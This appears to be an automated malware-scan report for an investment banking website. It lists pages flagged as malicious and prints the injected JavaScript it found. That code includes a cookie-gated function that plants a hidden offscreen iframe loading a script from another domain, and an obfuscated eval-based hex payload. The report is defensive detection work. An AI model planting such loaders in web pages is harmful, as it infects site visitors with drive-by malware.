Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=investmentbankerscorp.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://investmentbankerscorp.com/ | 200 OK Content-Length: 12157 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax';
function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = docume ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); p09(); } } Antivirus reports:
| ||
http://investmentbankerscorp.com/businessOwners.htm | 200 OK Content-Length: 10012 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Managers.htm | 200 OK Content-Length: 9947 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Advisors.htm | 200 OK Content-Length: 9759 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Investors.htm | 200 OK Content-Length: 10183 Content-Type: text/html | clean |
http://investmentbankerscorp.com/index.htm | 200 OK Content-Length: 11781 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax';
function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = docume ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); p09(); } } Antivirus reports:
| ||
http://investmentbankerscorp.com/OurTeam.htm | 200 OK Content-Length: 11745 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Experience.htm | 200 OK Content-Length: 31298 Content-Type: text/html | clean |
http://investmentbankerscorp.com/InvestmentStrategy.htm | 200 OK Content-Length: 16333 Content-Type: text/html | clean |
http://investmentbankerscorp.com/ExitedTransactions.htm | 200 OK Content-Length: 11553 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Portfolio.htm | 200 OK Content-Length: 9034 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Services.htm | 200 OK Content-Length: 12915 Content-Type: text/html | malicious |
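Malicious code - confirmed by antiviruses (see below). The captured snippet creates an iframe whose source is a URL on a different domain, gives it absolute positioning with very large offsets and dimensions (apparently to keep it outside the visible page), and appends it to the document:
function p09() {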
var static='ajax';
var controller='index.php';
var p = document.createElement('iframe');
p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php';
p.style.position = 'absolute';
p.style.color = '9851';
p.style.height = '9851px';
p.style.width = '9851px';
p.style.left = '10009851';
p.style.top = '10009851';
if (!document.getElementById('p')) {
document.write('<p id=\'p\' class=\'p09\' ></p>');
document.getElementById('p').appendChild(p);
}
}
functio Antivirus reports:
| ||
http://investmentbankerscorp.com/mer.asp | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://investmentbankerscorp.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://investmentbankerscorp.com/downloads.htm | 200 OK Content-Length: 17214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_80_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_80_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_74_7c_6d_6b_70_76_77_74_77_6f_71_6d_36_6b_77_75_37_7b_7d_78_78_77_7a_7c_37_6b_74_71_73_36_78_70_78_2f_ Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: investmentbankerscorp.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 16 Sep 2014 20:27:29 GMT
Server: Microsoft-IIS/6.0
Content-Length: 12157
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSRRSDS=MPAGGHDAGLCJJPOHKLNDDGOI; path=/
X-Powered-By: ASP.NET
...12157 bytes of data.
GET / HTTP/1.1
Host: investmentbankerscorp.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 16 Sep 2014 20:27:29 GMT
Server: Microsoft-IIS/6.0
Content-Length: 12157
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSRRSDS=MPAGGHDAGLCJJPOHKLNDDGOI; path=/
X-Powered-By: ASP.NET
...12157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: investmentbankerscorp.com
Referer: http://www.google.com/search?q=investmentbankerscorp.com
Result:
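The result is similar to the first query. No suspicious redirects were found. This check covers HTTP-level redirects only: the script captured in the scanned pages above runs in the browser and calls p09() only when the `visited_uq` cookie is not already set, so its effect would not appear as a redirect in these responses.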
GET / HTTP/1.1
Host: investmentbankerscorp.com
Referer: http://www.google.com/search?q=investmentbankerscorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.